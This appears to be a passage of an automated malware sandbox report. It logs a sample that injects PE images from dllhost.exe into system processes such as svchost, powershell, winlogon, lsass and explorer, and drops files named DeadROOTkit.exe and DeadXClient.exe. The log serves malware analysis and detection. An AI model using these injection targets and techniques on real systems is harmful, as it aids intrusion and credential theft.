                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27E6F950000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadXClient.exe base: 1B410000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EF2F790000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2023BB50000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 560000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\Public\Deadsvchost.exe base: 940000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000 value starts with: 4D5AJump to behavior
                          Injects code into the Windows Explorer (explorer.exe)
                          Source: C:\Windows\System32\dllhost.exeMemory written: PID: 2580 base: 8BA0000 value: 4DJump to behavior
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6968Jump to behavior
                          Writes to foreign memory regions
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: F1B13F3010Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000Jump to behavior
